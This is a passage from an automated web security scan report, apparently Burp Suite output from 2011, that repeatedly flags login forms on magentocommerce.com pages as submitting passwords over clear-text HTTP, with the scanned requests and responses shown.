Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Ffr%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 71918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.42. http://www.magentocommerce.com/he

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /he

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /he HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176550; expires=Sat, 11-Aug-2012 15:15:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhe%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.43. http://www.magentocommerce.com/hu

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /hu

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /hu HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176571; expires=Sat, 11-Aug-2012 15:16:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhu%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:12 GMT
Content-Length: 84278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.44. http://www.magentocommerce.com/imagine

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /imagine

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /imagine HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176634; expires=Sat, 11-Aug-2012 15:17:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fimagine%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:14 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.45. http://www.magentocommerce.com/it

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /it

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /it HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176549; expires=Sat, 11-Aug-2012 15:15:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fit%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:49 GMT
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.46. http://www.magentocommerce.com/jobs

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /jobs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175796; expires=Sat, 11-Aug-2012 15:03:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:16 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.47. http://www.magentocommerce.com/jobs/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /jobs/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170938; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.8.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:43:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171038; expires=Sat, 11-Aug-2012 13:43:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:43:58 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.48. http://www.magentocommerce.com/jobs/p/2/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/p/2/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /jobs/p/2/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176479; expires=Sat, 11-Aug-2012 15:14:39 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fjobs%2Fp%2F2%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:39 GMT
Content-Length: 41691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.49. http://www.magentocommerce.com/knowledge-base

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /knowledge-base

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /knowledge-base HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176264; expires=Sat, 11-Aug-2012 15:11:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:05 GMT
Content-Length: 54452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.50. http://www.magentocommerce.com/license/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /license/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176448; expires=Sat, 11-Aug-2012 15:14:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Flicense%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:08 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.51. http://www.magentocommerce.com/license/enterprise-edition

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/enterprise-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /license/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176482; expires=Sat, 11-Aug-2012 15:14:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Flicense%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:42 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.52. http://www.magentocommerce.com/lodger-footwear/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lodger-footwear/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /lodger-footwear/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176633; expires=Sat, 11-Aug-2012 15:17:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Flodger-footwear%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.53. http://www.magentocommerce.com/lt

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lt

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /lt HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176564; expires=Sat, 11-Aug-2012 15:16:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Flt%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:05 GMT
Content-Length: 80802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.54. http://www.magentocommerce.com/magento-connect

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.55. http://www.magentocommerce.com/maps/online

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /maps/online

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field: login[password]

Request

GET /maps/online HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
